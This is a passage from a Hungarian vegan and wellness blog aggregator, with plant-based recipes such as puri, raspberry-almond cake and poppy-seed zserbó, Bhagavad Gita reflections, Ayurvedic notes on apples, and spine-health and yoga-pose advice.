de enélkül is megállják a helyüket. Ezt a műveletet végezzük el az összes levéllel. Egy nagy, vagy több kisebb sütőedény aljára öntsük a paradicsomszószt, erre ültessük rá a kelkáposzta csomagokat. Lefedve süssük az előmelegített sütőben 15 percig, fedő nélkül 15 percig. Köretnek illik hozzá a pirított kalács, a pita, a burgonya gratin, sült édesburgonya - válogasson mindenki magának ezek közül, vagy nem ezek közül saját ízlése szerint!
Puri - friss, élesztőmentes, indiai lepénykenyér
2019. október 26. Élj harmóniában
A legtöbb indiai kenyér lapos és nem nagy, felfújt, amiket élesztővel készítenek. Általában a tűzhely tetején sütik és nem sütőben. Azért, hogy a lehető legtöbb prána (életenergia) legyen benne, ezeket frissen készítsd, mindig az étkezések előtt. Az indiai kultúrában a kenyér, gyakran kanál helyett is használatos:) Korábban a chapati kenyér receptjét már közreadtam itt olvashatod. Puri egy zsiradékban kisült lepénykenyér. Teljes kiőrlésű búzalisztből és vízből készül - a lisztet lehet fehér liszttel is keverni vagy használhatsz graham lisztet is. Kisütésnél eredetileg ghíben sütik ki, de használhatsz kókuszzsírt vagy bármilyen sütőolajat. A ghí készítését egy korábbi bejegyzésben már részletesen leírtam. Hogyan készíts ghít? A puri minden ájruvédikus alkat számára ajánlott, de kapha alkatúak ritkábban fogyasszák. Puri - friss, élesztőmentes, indiai lepénykenyér Hozzávalók 16 darabhoz: - 350 g teljes kiőrlésű liszt (vagy graham liszt vagy fehér liszttel kevert liszt) - 175 ml langyos víz - 1/2 kk. só - 1 ek. vaj vagy ghí - olaj a sütéshez A sót keverd el a liszttel és morzsolt el benne a ghít. Lassanként add hozzá a vizet, hogy lágy tésztát kapj.Nyújtódeszkán 6-8 percig gyúrd, míg fényes nem lesz majd akár lehet pihentetni is. Ismét gyúrd át. A zsiradékot melegítsd fel egy edényben. Közben formálj a tésztából 16 egyforma nagyságú gombócot. A gombócokból kevés ghí segítségével egyenletesen vékony lepényeket nyújts ki. . Amikor a ghí felmelegedett, vedd a lángot kisebbre. Akkor kezdj el sütni, amikor ha beleteszel egy pici tésztát, az azonnal feljön a tetejére. Tedd a lepényeket a forró ghíbe, olajba és pár másodperc múlva fel is fog jönni a felszínre, finoman nyomkodd le egy kiszedővel és alul fel fog fújódni amolyan lufi szerűen:) Majd fordítsd meg a purit és a másik oldalt is süsd kb 15 másodpercig. Végül vedd ki és szűrőben vagy papírtörlőn csöpögtesd le. Süss ki minden purit és forrón tálald. Fogyaszthatod édesen és sósan is. Néhány ötlet, aminek csak a képzeleted szab határt:): édesen: porcukros puri esetleg plusz tejszínhab, lekváros puri, puri csokikrémmel (házi nutella receptet itt találsz a blogon), édesen magkrémekkel sósan: zöldséges főétel subji mellé, hüvelyes ételekkel, levesekkel, csicseriborsókrémmel (hummusz recepteket találsz a blogon gyors hummusz és klasszikus hummusz), mindenféle magokból készült kencékkel (ilyeneket is találsz a blogon pl tökmagos ). Jó étvágyat hozzá:) Kati
Bhagavad Gíta idézetek - a test elhagyás
2019. október 7. Élj harmóniában
A modern tudomány is elismeri, hogy a test sejtjei állandóan változnak. A változás megnyilvánul a gyermekkortól a serdülőkoron át egészen az öregkorig . Amikor a test megöregszik és már nem funkcionál megfelelően, esetleg tulajdonosának szenvedést okoz, olyankor a lélek egy másik testre vált. Elhagyja az öreg, hasznavehetetlen testet és egy új testbe költözik. Amikor valaki elhagyja a testét, akkor a hozzátartozóknak hiányozhat a jelenléte, de tudnunk kell, hogy a személy nem szűnik meg létezni, csak máshová költözött. Egy korábbi bejegyzésben már a Bhagavad Gíta 2.20-as versét idéztem, amely leírja, hogy a lélek nem ismer sem születést, sem halált, soha nem keletkezett, nem most jön létre és a jövőben sem fog megszületni. itt olvashatod a bejegyzést A lélek halhatatlan, ezért sem érzi magát öregnek az, akinek a teste megöregedett, mert ő maga nem öreg és senki nem hal meg, csak elhagyja a testét. A lélek hiányában a test az ami szétesik, elenyészik. #bg #idézet #lélek #halhatatlan #örökkévaló #Bhagavadgíta #test #jóga
Lecsós krumplipaprikás (laktózmentes, gluténmentes, vegán) + Jótékonysági főzés
2019. szeptember 23. Zizi kalandjai
Eltelt egy hónap az utolsó bejegyzésem óta… nyári szabadságon voltam, aztán bedarált az évkezdő szeptember, a sok feladat és ihlet sem volt az alkotásra. Most viszont hoztam egy nagyon egyszerű, még nyarat idéző sós receptet. Sósat, ami nagy szám, mert az utóbbi időben az édes receptek voltak többségében a blogomon. Véletlenül született a recept, amikor mindenféle maradékot összedobáltam... Source
Málnás torta mandulával (vegán)
Sok vegánnak, vagy tejallergiásnak, tejmentesen étkezőnek nehézséget okoz a tejszín és a tejszínhab megoldása például tortákban. Több külföldi receptes oldalon láttam, hogy konzerves kókusztejet használnak erre. Sokáig féltem kipróbálni, kudarctól tartva. Tavaly télen azonban áttörtem félelmem eme jegét :) . Férjem születésnapjára készítettem fekete-erdő tortát vegán módra, amihez tulajdonképpen konzerves kókusztejet használtam. Ennek a receptjével még tartozom, idővel majd feltöltöm. Most azonban egy málnás-mandulás torta receptjét mutatom meg. Egy régi ismerősömet láttuk vendégül nálunk, erre az alkalomra készítettem a tortát. Tejmentes, tojásmentes és fehér cukor mentesen készült, zselatin és társait sem kellett hozzá tenni, mégis nagyon finom lett. Egy szelet nem volt elég senkinek. :)
A torta receptje:
Hozzávalók:
- 10 evőkanál liszt
- 5 evőkanál teljes kiőrlésű liszt
- 3-4 evőkanál nyírfacukor vagy gyümölcscukor
- 20 evőkanál növényi tej
- 3 evőkanál olaj
- 1 teáskanál szódabikarbóna
- sütőpapírral kibélelt sütőforma vagy szilikon forma
Elkészítés:
Egy edényben összekeverjük először a száraz hozzávalókat,a liszteket és a szódabikarbónát érdemes együtt átszitálni és utána hozzákeverni a nyírfacukrot. Hozzá kanalazzuk a növényi tejet és olajat. Jól összekeverjük az egészet, majd a sütőformába szépen elsimítjuk és előmelegített sütőbe készre sütjük. Tűpróbával megnézzük, hogy a tészta átsült-e.
A krém receptje:
- 2 konzerv kókusztej
- 2 kanál nyírfacukor (vagy gyümölcscukor vagy eritrit)
- 10-20 szem málna
Elkészítés:
A konzerv kókusztejet egy éjszakára érdemes hűtőben tartani. Ha ezt elfelejtettük, tegyük a fagyasztóba kb. 1 órára. Ezt a konzervet érdemes óvatosabban kezelni, nem felrázni, hogy minél sűrűbb állagú kókusztejet kapjunk. Tetejéről a sűrű réteget egy habverő tálba kanalazzuk. Habverővel habbá verjük. Amikor a hab kész, hozzáadjuk az édesítőt. (Szirup-félét, mint agavé, nem ajánlom, mert a hab folyékonnyá válik.) A habot két részre osztjuk, az egyikhez hozzákeverjük a villával összetört málnát és azzal jól átkeverjük (habverőt használva).
Málnás krém receptje:
- 10 dkg málna
- 1-2 evőkanál nyírfa vagy gyümölcscukor
A málnát összetörjük egy tűzálló tálba. Meghintjük cukorral és összefőzzük dzsem állagúra.
A torta összeállítása:
A megsült tortát félbevágjuk. Az alsó tésztát megkenjük a málnás krémmel, majd rákanalazzuk a málnás tejszínt. Erre finoman ráfektetjük a torta másik lapját (Én ezt is bekentem a málnás krémmel, de talán jobb lett volna, ha szárazon hagyom.). A tetejét és a torta oldalát bekenjük a fehér tejszínnel. Az oldalára a tenyerünkkel finoman mandula lapokat helyezünk, a torta tetejét pedig mandulával és egész málnával dekoráljuk. Ha ügyes kezünk van, habnyomóba töltött tejszínhab formákkal is dekorálhatjuk a tortát. Ha elkészült a torta, hűtőben tároljuk tálalásig.
Sült paradicsomleves
2019. szeptember 5. Vegavarázs
Nemrég próbáltam ki a paradicsom sütőben való elkészítését. Az első alkalommal rajongója lettem a módszernek, hiszen segítségével sűrű, ízes, édes és nem savas szószt készíthetünk. Nem ég oda, nem kell keverni. Amikor paradicsom szezon van, érdemes kis üvegekben befőzni, télen aztán bármit...
Bhagavad Gíta idézetek - kiegyensúlyozottság
2019. július 30. Élj harmóniában
Ha szeretnénk kiegyensúlyozottan élni, akkor meg kell tanulnunk a boldogság és boldogtalanság ideiglenes megjelenését és eltűnését eltűrni, mert ezek az élethez tartoznak. Ahogy a hegyeknél van fent és lent, a hullámokban és a természet minden formájában megtalálható a fent és lent, a hullámhegy és hullámvölgy... az állandó váltakozás. Ahogy váltakoznak az évszakok és a hidegebb időben ugyanúgy megfürdünk és főzünk, gondoskodunk a szeretteinkről, végezzük a tevékenységeinket, kötelességeinket, amikor jön a nyári hőség akkor is mindent megteszünk, elvégzünk. Nincs miért kiborulni azon amikor éppen nem vagyunk boldogok, mert ez természetes, ha volt valami nagy boldogság, előbb utóbb jön a boldogtalanság. Ahogy a mondás is tartja egyszer fent, egyszer lent. Az embernek éppen ezért érdemes törekedni a megfelelő tudás megszerzésére, a világ működésének megértésére, a tudatos életre és spirituális fejlődésre. Ez tud minket megszabadítani a boldogság és boldogtalanság állandó változása által okozott szenvedéstől. szeretettel: Kati
Sült édesburgonya hasábok és guacamole (laktózmentes, gluténmentes, vegán, PKU barát receptek) + Mi az a PKU?
2019. július 2. Zizi kalandjai
Most egy olyan bejegyzést hoztam nektek, amelyben van két recept, de ezzel egy különleges betegségre szeretnénk felhívni a figyelmet. Ez pedig a PKU (PhenylKetonUria), magyarul a fenilketonúria. A fenilketonúriásnak tilos húst, húsféléket, halat, tejtermékeket (túró, sajt, tej, stb…), gabonából készült termékeket (kenyér, kifli, stb…), hüvelyeseket (szárazbab, borsó, stb…)... Source
Hippokratész - a betegség
2019. június 16. Élj harmóniában
A legnagyobb kincs az ember életében az egészsége. Bármennyi pénze lehet valakinek, bármennyire híres lehet, ha az egészsége nincs rendben, akkor az élete szenvedéssé változik. A legjobb körülmények sem kellemesek, amikor egy ember nem egészséges. A mai kor embere ezt hajlamos elfelejteni. Sokan hajtják túl magukat, állandóan rohannak, nem figyelnek az életmódjukra, stresszesek, nem mozognak eleget vagy nem táplálkoznak tudatosan és ugyan van pénzük sok mindenre, de nem egészségesek... A betegségek, mindig figyelmeztetnek minket valamire... érdemes tanulni a betegségeinkből. Néha csak azért kapunk egy betegséget, hogy lassuljunk le vagy szenteljünk nagyobb figyelmed önmagunknak, egészségünknek, a minket szerető személyeknek. A tárgyak, a szép ház, autó és a bankszámla nem hoz egészséget. Az egészséget a megfelelő helyes szokások kialakításával, a belső harmónia megteremtésével és a megfelelő tudatossággal, figyelemmel tudod elérni:) Ne feledd, mindig minden érted van és a fejlődésedet szolgálja:) szeretettel: Kati
Kölestúróval rakott kelkáposzta – vegán recept
Egy egyszerű, olcsó, és nagyon finom főétel a rakott kelkáposzta: ebben nincs semmilyen húst helyettesítő anyag, inkább túróra hasonlít a kölesből készült réteg. Hozzávalók: fél fej kelkáposzta 2 dl köles 1 kisebb vöröshagyma 2 pohár vegán tejföl (vagy szójajoghurt) 2 dl. édesítetlen növényi tej 1 kávéskanál kapor (ha szereted) 2 gerezd fokhagyma só pici olaj a tepsi kiolajozásához növényi sajt (opcionális) A kelkáposztát sós vízben megfőzzük, hogy még roppanós legyen. A vöröshagymát felkarikázva, pici sóval, vízzel, alacsony lángon, fedő alatt megpároljuk egy tapadásmentes serpenyőben. A kölest a növényi tejjel, sóval, kaporral, a fokhagymanyomón átnyomott fokgagymával, és még 4 dl vízzel készre főzzük. (Háromszoros legyen a folyadékmennyiség a köles mennyiségéhez képest.) A kiolajozott tepsit a párolt hagymával, főtt kölessel, vegán tejföllel, kelkáposztával rétegezzük, a tetejére mehet növényi sajt, de nem muszáj. Sütőben kb 200 fokon pirosra sütjük. Vegán tejfölből jelenleg a Dr. Oetker tejföle az egyetlen opció Magyarországon, Aldiban, Auchanban általában kapható, de más nagy és közepes áruházakban, bioboltokban is fellelhető. Tedd a kedveceim közé 0 The post Kölestúróval rakott kelkáposzta – vegán recept appeared first on VegaNinja.
Mogyoróvajas muffin nyers-vegán
Felejtsd el a tűzhely használatát erre a sütire! Különben is " végre itt a nyár és meleg (?) az idő, az ember strandra jár..." Khm, éppenséggel strandra azért nem ajánlom, hogy elkészítsd ezt a sütit, de egy BBQ partira, vagy egy egyszerű vendégségre, bátran tehetsz egy próbát. Laktató, az emberek nem tudnak egyszerre sokat enni belőle és ráadásul tényleg nem kell hozzá se sütő se főzőlap, turmixgép és/vagy gyorsaprító viszont annál inkább. Van még valami jó ebben a sütiben, az hogy nincs benne se fehér cukor, se cukor helyettesítésre szolgáló édesítő (se xylit, se gyári gyümölcscukor, se agavé szirup, se kókuszvirág cukor). Oh, és még egy jó dolog, nem kell bekapcsolni a sütőt, vagy ezt említettem már? :) Mindezek felett pedig gluténmentes, vegán, tehát tej, tojás és állati termék mentes tömény élvezet.
A recept
A desszert alapja
Hozzávalók:
- 25 dkg olajos magvak, mogyorófélék megdarálva (pl.dió, lenmag, mogyoró, tökmag, napraforgómag, ami épp van az otthonunkban)
- 10 dkg mazsola
- 4 ek karobpor (Ha nincs, használhatunk cukrozatlan kakaóport, de a karob egészségesebb és a mazsolához jobban passzol, szerintem.)
- víz
- útifű maghéj
Elkészítés:
Az olajos magvakat és mogyoróféléket külön külön jó alaposan megdaráljuk pl. kávédarálóval. A mazsolára jó meleg vízet öntünk, annyit csak, hogy épp ellepje. Ezzel beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. A vizet, amiben ázott a darált olajos magvakra öntjük, majd szintén ehhez keverjük a mazsola-masszát és a karobport. Egy kevés vizet adunk még hozzá, ha szükséges ahhoz, hogy egy nagy gombócot tudjunk formálni ebből a masszából. Egy muffinsütőt kibélelünk papírokkal, majd mindegyikbe kb 1 evőkanálnyit adagolunk és az ujjainkkal jól belenyomkodjuk. Egy-egy csipet útifű maghéjat szórunk a tetejükre. Amikor ez kész, a hűtőbe tesszük.
Ha nincs muffinsütőnk, egy nem túl nagy tespi vagy egy tortatforma is jó lesz. Ez esetben érdemes frissentartó fóliával kibélelni és a masszát abba simítani, nyomkodni.
A mogyoróvajas krém receptje
- 20 dkg kenhető állagú mogyoróvaj
- 10 dkg mazsola
- 10 dkg kókuszkrém (dobozos, mint ez vagy ez vagy ez vagy ez)
- 5 dkg kókusz-zsír
- 3 ek útifű maghéj
Elkészítés:
A mazsolára jó meleg vízet öntünk, annyit csak, hogy épp ellepje. Ezzel beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. A mogyoróvajat ezzel a mazsolás masszával átdolgozzuk, átkeverjük, a legjobb, ha gyorsaprító vagy turmix gépben. Ehhez keverjük a kókuszkrémet. (A kókuszkrém állagahasonló, mint a szilárd kókuszzsír, de mégis valamivel krémesebb. Leginkább tömbben kapható.) Hozzáadjuk a kókuszzsírt is. Ha a turmix vagy aprítógép ezt nehezen viszi, a mazsola áztatásból fennmaradt vizet hozzáönthetjük. Vigyázzunk azonban, ne legyen túl folyékony. A végén pedig az útifű maghéjat adjuk hozzá. Ha túl folyós lenne a mogyoróvajas massza, több útifű maghéjjal tudjuk szilárdabbá tenni. Amikor minden összeállt, a hűtőben pihenő tészta tetejére simítjuk. Díszíthetjük kókuszcsipsszel, aszalt gyümölcsökkel, pl. datolyával, barackkal, vagy a tetejére szórhatunk karobot esetleg fahéjat.
Végső tálalás előtt hűtőben pihentetjük pár órát. Ha kevés időnk van a vendégek érkezéséig, érdemes egy órára a fagyasztóba tenni.
Epres-tejfölös rakott sütemény
Kiváló lehetőség maradék keksz, kalács, piskóta átalakítására. Természetesen eper helyett más gyümölccsel is készülhet. Az epret nyersen is beletehetjük, ám véleményem szerint kifejezetten jót tett neki, hogy felfőztem. A rengeteg eső miatt elég vizes és nem túl édes az eper idén, az összefőzéssel...
Az alma hatásai és ájurvédikus alkalmazása
2019. május 30. Élj harmóniában
Az alma nagyon sokféle színben és fajtában létezik. Az ájurvédikus gyógyításhoz az édes, érett tulajdonsága és savanyú tulajdonsága ami lényeges. Az édes almák enyhén fanyarok, hűsítőek és az emésztés utáni hatásuk édes. A savanyú almák, leginkább fanyar ízűek és szintén hűsítőek. Az almák jók a a pittáknak és kaphaknak, de túl szárítóak a vata-knak, hacsak nincsen jól megfőzve és megfűszerezve. Az alma héját nehéz megemészteni és gázosodást okozhat. Az alma magját ne fogyaszd el, mert fanyar, keserű hatású és a vata egyensúlytalanságát okozhatja. Néhány ájurvédikus alkalmazási mód: - Bár stimulálja a vata-t a nyers alma megszünteti a székrekedést, az íny vérzést és a túl sok nyálat a szájban. Tradicionálisan még szájnyálkahártya gyulladása esetén használják. Étkezés után 1 órával, hámozz meg 1 almát és utána rágcsáld el alaposan. Ez segít a belek munkáját szabályozni és tisztítja a nyelvet és a fogakat. (Az alma héját nagyon könnyen le tudod szedni, ha 15 percre forró vízbe áztatod az almát.) - Az almalé nagyon jó a pitta jellegű égő érzésekre (mint a vastagbél gyulladás, gyomorhurut, húgyhólyag fertőzések). - Hányinger és vérhas ellen néhány almát hámozz meg és főzd puhára. Adj hozzá egy csipet szerecsendiót, sáfrányt és egy teáskanál ghít és lassan edd meg. (a ghí készítését itt találod) - Egy kiváló desszert recept:) Hámozz meg 5 almát és távolítsd el a csutkákat. Készíts az almákból egy pépet és ízlés szerint adj hozzá mézet és jól keverd el. Tegyél hozzá 1/8 teáskanál őrölt kardamomot, csipet sáfrányt, csipet szerecsendiót és 10 csepp rózsavizet vagy pedig néhány bio rózsának a szirmát. Ebbél a pépből egyél fél csészével (125 ml) étkezés után legalább 1 órával. A rossz kominbináció elkerülése miatt, előtte vagy utána 4 órával ne egyél tejet, joghurtot vagy halat. Ez a desszert jó energetizáló étel a szívizmoknak, relaxálja a vérereket és segít a lábizzadás elkerülésében is. Tradicionálisan jó álmatlanságra, szexuális gyengeségre visszérre és köszvényre. Kizárólag vegyszermentes (bio) almát fogyassz. Jó egészséget kívánok:) szeretettel: Kati felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Tégy a gerinced egészségéért! - Ülő életmód problémák nélkül
2019. április 29. Élj harmóniában
A kisbabák ahogy fejlődnek, elkezdik felfedezni a mozgás örömét és szépen fokozatosan életre hívják a mozgásrendszerüket, megerősítik azokat az izmaikat amik az álláshoz, járáshoz, egészséges mozgáshoz szükségesek. Aztán társadalmunk elkezdi őket behelyezni egy ülő helyzetbe - etetőszék, autós ülés, kanapé, íróasztal, autó, busz, iskola pad, étkező asztal, számítógép, videójáték, tv, repülőgép, mozi, egyetemi előadó, munkahelyi íróasztal, etc... és egyre többet ülnek, ahogy haladnak a felnőtt kor felé. Az emberi test elsődlegesen mozgásra van tervezve és nem arra, hogy napi 8-10 órát üljünk. Ma már számos kutatás támasztja alá, hogy az ülő életmód kifejezetten káros a mozgásrendszeredre. A túl sok ülés létrehoz a testedben egy helytelen, rossz tartást - bizonyos izmok befeszülnek, bizonyos izmok elgyengülnek, a kötőszövet (fascia) átalakul és a rendszeres ülés miatt rögzül egy rossz mozgásminta, egy tartáshiba, ami egy idő után már nem csak ülés közben lesz jelen, de a hétköznapjaidban is - pl. ha állsz a buszmegállóban vagy a közérzetben. Az egyik tipikus ilyen jelenség, amikor valakinél úgynevezett előrehelyezett fejtartás jön létre - pl. sok mobiltelefon használat vagy monitorozás következtében. Ez általában azzal jár, hogy a lapocka közti területen az izmok elgyengülnek, a mellizomnál rövidülés jön létre, a vállak előre esnek. Ez a helytelen tartás nem csak esztétikai probléma, de kifejezetten káros a gerincedre és a nyaki porckorongjaidra nézve - a nyaki gerincsérv elő kapuja is lehet, Okozhat fejfájást, szédülést, látás zavart, karba kisugárzó zsibbadást, kar- és váll fájdalmakat.. A másik tipikus ilyen eset, amikor az ülés miatt a medence körüli terület egyensúlya megbomlik és bizonyos izmaid megrövidülnek - pl csípőhorpasz izom, combhajlító izmok és olyan izmok, amelyek feladata a stabilitás biztosítása lenne elgyengülnek pl. farizom, hasizmok, mély hátizmok. A medence körüli terület diszballansza miatt sok esetben a deréktáji szakaszon alakul ki egy helytelen tartás - akár túlságosan előre , akár túlságosan hátra billen a medence, Ez hosszú távon okozhat akár gerincsérvet, derékfájást, lábba kisugárzó fájdalmat, zsibbadást . A helytelen, görnyedt tartás még a légzésedet is blokkolja, energiahiányhoz vezet és okozhat emésztési problémákat, székrekedést is Hogyan tegyél ellene? Mozogj rendszeresen Sétálj amikor csak teheted. Végezz gerincbarát testmozgást (jóga, thai chi, gerinctorna, etc) . Hetente 3 - 4 alkalommal minimum 40-50 percet szánj mozgásra. Ne ülj annyit A tömegközlekedésen és amikor csak tudod kerüld az ülést. Rendszeresen állj fel az ülő helyzetből - nyújtózkodj, sétálj, mozogj valamit:) Akár végezz néhány egyszerű kimozgatást vagy nyújtó vagy erősítő gyakorlatot. Gerincbarát életmód A nap 24 órából áll. Ha 24 órában helytelenül tartod magad, évek után komoly fájdalmak, problémák alakulhatnak ki. Sajátítsd el, hogyan tudsz gerincbarát módon élni Ezekről írtam pár a blogon is: helyes ülés, fekvés, mobilozás, sportolás, takarítás, emelés-cipekedés, lehajolás, táskacipelés, etc.. Nyújts Jegyezd meg nem elég az erősítés, elengedhetetlen a megfelelőnyújtás. Sajátítsd el a nyújtó gyakorlatok és a jógapózok helyes kivitelezését, amivel kompenzálni tudod az ülő munka okozta problémákat. A blogon megannyi jógapózt (ászanát) találsz, amivel egyszerre nyújthatod és erősítheted is a tested. Ne stresszelj Amikor feszültség jön létre az elmédben, olyankor feszültség lesz a testedben is, ami előbb utóbb tartáshibákhoz vezet. Érdemes elsajátítanod, hogyan ne legyél stresszes és hogyan szabadulj meg a feszültségektől. A relaxáció, meditáció és jóga megfelelő alkalmazása sokat segít. Egészséges gerincet kívánok:) szeretettel Kati
Mákos zserbó szilvalekvárral
A legtöbb ember gondolatvilágában a zserbó egyet jelen a dióval és a baracklekvárral töltött finom, csokis tetejű süteménnyel. Már régóta érett bennem a gondolat, hogy mákkal és szilvalekvárral is elkészítve is biztos nagyon finom. Nem tévedtem. Ha valami különlegeset, de mégis megszokottat szeretnél az ünnepi asztalra tenni, kipróbálhatod a mákos zserbót. A baracklekvárt pedig szilvalekvárra cserélve.
A recept
Hozzávalók a tésztához:
- 10 dkg teljes kiőrlésű liszt
- 25 dkg fehér liszt
- fél csomag porélesztő vagy 1 tk instant élesztő
- csipetnyi só
- 1 dl víz
- 1 tk szódabikarbóna
- 20 dkg margarin (vegán)
Hozzávalók a töltelékhez:
- 40 dkg mák megdarálva
- 25 dkg xylit/gyümölcscukor/erithritol (ki milyen édesítést használ cukor helyett)
- 70 dkg szilvalekvár (egy nagyobb vagy 1,5 kisebb üveg lekvár)
Csokibevonó:
1. verzió:
- 20 dkg tortabevonó (vegán)
- 1-2 ek. olaj
2. verzió:
- 10 dkg kókuszzsír
- 2 ek kakaópor/karobpor
- 1 ek xylit/gyümölcscukor/erithritol (ki milyen édesítést használ cukor helyett)
Elkészítés:
A margarint vegyük ki a hűtőből és tegyük olyan helyre egy tálkába, ahol megpuhul. A kétfajta lisztet összekeverjük egy tálban, majd hozzákeverjük a csipetnyi sót, a porélesztőt és a szódabikarbónát. A puha margarint beleszeleteljük a lisztbe, majd a kezünkkel összedolgozzuk és adunk hozzá 1 dl vizet, hogy az egész egy gombóccá összeálljon. Ha ragacsos tészta, gyúrás közben még szórhatunk hozzá kevés lisztet. Ha nem akar összeállni egy egésszé, akkor pedig vizet csepegetetünk hozzá.
Liszttel megszórt gyúródeszkán vagy munkalapon átdolgozzuk, átgyúrjuk a két kezünkkel. Egy henger alakú formát sodrunk a tésztából, majd három egyenlő részre vágjuk. Először az egyik részt sodrófával téglalap alakúra formáljuk. Közel akkorára, mint a tepsi, amibe helyezni fogjuk. A tepsibe sütőpapírt teszünk. A kinyújtott tésztát úgy a legkönnyebb a tepsibe tenni, ha feltekerjük a sodrófára és a sodrófáról letekerve helyezzük bele a tepsibe.
A tésztát eligazítjuk, a tepsi oldalára jutó részt levágjuk, majd alaposan megkenjük szilvalekvárral. A porhanyósra darált mákot összekeverjük az édesítővel, majd a mák felével megszórjuk a lekvár tetejét. Jöhet rá a következő tésztalap. Téglalap alakúra nyújtva, a sodrófa segítségével a lekváros mákos réteg tetejére tesszük, eligazítjuk, ha a tepsi oldalára jutna tészta, levágjuk. Ezt a maradék tésztát hozzágyúrjuk a következő, egyben utolsó tésztához és hasonlóan a szilvalekvárra mákot szórunk, majd befedjük a tésztával.
A tésztát szépen eligazítjuk, a szélét az ujjaninkkal benyomkodjuk. Az utolsó szint a tészta kell, hogy legyen, amit megszurkálunk villával, majd egy órát hűvős helyen pihentetjük. Előmelegített sütőben 180 fokon kb. 35 perc alatt készre sütjük.
Amig sül, elkészítjük a csokimázat.
1. verzió:
Vizgőz felett felolvasztjuk a csokit és hozzákeverünk 1-2 ek. olajat. Addig kevergetjük, míg teljesen elegyedik.
2. verzió:
Vizgőz felett felolvasztjuk a kókuszzsírt és hozzákeverjük a karob vagy kakaóport és az édesítőszert. (Akár Agavé szirupot is használhatunk).
Ez követően a megsült, lehűlt sütemény tetejére öntjük a csokiszószt és egyenletesen elkenjük. Érdemes a csoki megdermedése előtt felvágni, de nem kiszeletelni. Ezt követően hűtőbe tesszük és amikor a csoki megdermedt teljesen a tetején, könnyebb lesz a szeleteket a tepsiből kiemelni.
Tehát a tepsibe helyezés lépései: tészta, lekvár, mák, tészta, lekvár, mák, tészta, tűvel szurkálni, pihentetni, sütni, kihülés után csokimáz/karobmáz.
Villámgyors csokoládés keksz (laktózmentes, vegán)
2019. március 21. Zizi kalandjai
Hétvégére szeretnétek egy fincsi csokis keksz receptet? Akkor már meg is találtátok. Semmi különleges mentes hozzávaló, semmi extra, és eredményként kaptok egy gyorsan elfogyós kekszet! Jöttünk haza az oviból 13 óra után és tudtam, hogy egy nagy kertészkedés vár ránk és vágytam egy kis édességre, ami meghozza az erőt a nagy munkálatokhoz. Kerestem a neten egy csokis keksz receptet... Source
Reteklevél-krémleves – avagy el ne dobd a levelét! (vegán)
A retek leveléből is lehet levest csinálni, hasonlít a csalánlevesre, aminek a receptjét itt találod. Finom, fokhagymás ízű, de mégis könnyű krémleves, mivel sem habarás, sem olaj nincs benne. Nyilván rendkívül olcsó elkészíteni. Hozzávalók: legalább 2 csomó retek levele 1 gerezd fokhagyma fél teáskanál só 1 dl édesítetlen növényi tej (pl. szójatej) A leveleket nagyjából átválogatjuk, alaposan megmossuk, és egy edényben, sós vízzel feltesszük főni. 5-10 perc múlva hozzáadjuk a szójatejet, majd botmixerrel krémesítjük. Növényi tejszínnel, magvakkal, vagy kenyérkockával is tálalhatjuk. The post Reteklevél-krémleves – avagy el ne dobd a levelét! (vegán) appeared first on VegaNinja.
Póréhagyma-krémleves – vegán recept
Borzasztó egyszerű és olcsó póréhagymából levest csinálni, a sóval együtt mindössze 4 hozzávaló kell bele.
Hozzávalók: 1 póréhagyma 1 nagyobb krumpli 2 dl édesítetlen szójatej (vagy más növényi tej) kb. 1 teáskanál só
A fő összetevők – póréhagyma és krumpli
A póréhagymát alaposan megmossuk, a két végét levágjuk és kidobjuk, a töbi részét pedig felkarikázzuk, de nem kell túl vékony karikákra.
A krumplit megmossuk, meghámozzuk (utána még egyszer megmossuk), és félujjnyi szeletekre vágjuk.
A krumplit és a póréhagymát 2 dl vízzel és a sóval feltesszük főni egy edényben. Amikor megpuhultak, hozzáöntjük a szójatejet, és botmixerrel krémesítjük. Vigyázz, csak fém fejű botmixert szabad a forró levesbe tenni! Ha műanyagod van, várd meg, hogy kicsit kihűljön a leves, mielőtt belenyomod a mixert. (A szójatej elhűti kicsit.)
Ez után forraljuk fel, és kész is. Vegán tejföllel, kenyérkockákkal vagy pirított magvakkal (napraforgómag, tökmag vagy fenyőmag) tálaljuk.
The post Póréhagyma-krémleves – vegán recept appeared first on VegaNinja.
Tégy a gerinced egészségéért! - Dvikónászana (Kétszögpóz)
2019. február 5. Élj harmóniában
A Dvikónászana (Kétszögpóz) egy állásból előrehajlító jógapóz, nagyon hasonlít a Uttanászanára (itt olvashatsz róla) - mondhatni annak egy válto zata. Ez az ászana alaposan megnyújtja a test hátulsó vonalát, hatással van a lábakra, csípőre, gerincre és szuper jól segít megnyitni a mellkasi területet. Oldja a karok és a vállöv feszültségeit. Kiválóan kompenzálja a számítógép előtti görnyedést, rugalmassá teszi a lábakat, a karokat és a vállakat. M int minden előrehajlító jógapóz, segít átmasszírozni a belső szerveket, ezáltal energetizálja a lépet, májat, gyomrot, beleket. Mivel intenzíven hat az emésztőrendszerre, csökkenti a gyomor panaszokat, segíti az emésztést és a méregtelenítést is. Az ájurvéda még a hasi zsírpárnák eltávolítására is javasolja. Dvikónászana (Kétszögpóz) Oldja a feszültséget és na gyon jól nyugtatja az idegeket - jól használható stressz esetén. Azáltal, hogy a fej lentebb kerül, serkenti a vérellátásban a fejben, így hatással van az arcbőrre is - kedvezően hat a ráncok kialakulása ellen. Hogyan végezd el? - Kiindulási póznak állj meg Tadászanaban (hegytartásban). - A karjaid helyezd a tested mögé, tedd össze a kezeket és kulcsold össze a kézujjakat. - Kilégzéssel, hajlított térddel és egyenes háttal hajolj előre, folyamatosan nyújtózva a karokkal, a hátaddal és a hasaddal is. - A testsúlyodat próbáld egyenletesen eloszlatni a két talpadon (testsúly 3 ponton oszlik el: a nagyujj alatti párnán, a kisujj alatti párnán, és a sarkadon) és próbáld a belboka területét megemelni. - A lábakat kezd el kinyújtani, de csak annyira, hogy még a hasad és a combod együtt maradjon. - Húzd be picit a farokcsontot - húzd be a hasad is a köldök alatti rész legyen aktívan megtartott és a farizmokat is picit feszítsd meg. Az ülőcsontokkal dolgozz fölfelé. - A törzsed mindkét oldalát próbáld egyformán nyújtani. - Nyisd ki a mellkasi területet: húzd a vállakat hátrafelé távol a fülektől, a medencéd irányába, próbáld távolítani egymástól a kulcscsontokat. A szegycsonttal is próbálj finoman nyújtózni. - Próbáld vállból folyamatosan emelni a karok a magasba. - 